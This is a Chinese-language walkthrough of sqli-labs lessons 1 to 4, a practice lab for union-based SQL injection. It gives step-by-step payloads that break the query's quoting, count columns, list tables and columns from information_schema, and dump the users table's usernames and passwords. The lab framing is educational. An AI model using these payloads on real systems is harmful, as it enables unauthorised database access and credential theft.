sqli-labs less1-4(union注入)
less-1
考点:Single quotes
输入:
- 判断类型
- ?id=1
返回loginname和password。输入的id就是与后台数据库连接的接口通过id=? 查询数据库信息
- ?id=1' 报错
其中 '1'' LIMIT 0,1去掉我们输入的1'就能看到''LIMIT 0,1为网站的原生sql语句。那也就是说明网站的id类型为单引号包裹的字符型
-
id=1' and 1=1 --+
-
id=1' and 1=2 --+
如果两句语句得到的页面信息不一致说明id类型正确,继续后面操作
- 判断字段个数
- ?id=1' order by num --+ (nums是个变量随便进行调试直到页面报错)
- 查询数据库
- 1' and 1=2 union select 1, version(), database(); --+
- 爆表名
- 1' and 1=2 union select 1, (select group_concat(table_name) from information_schema.tables WHERE table_schema='security'), 3 --+
- 爆列名
- 1' and 1=2 union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),3 --+
- 数据
- ?id=1' and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
less-2
与less-1不同的是闭合方式,但是操作完全一样
less-3
与less-1不同的是数据类型,操作一样
less-4
less-4 用的是("")的方式闭合字符串的,字符型注入
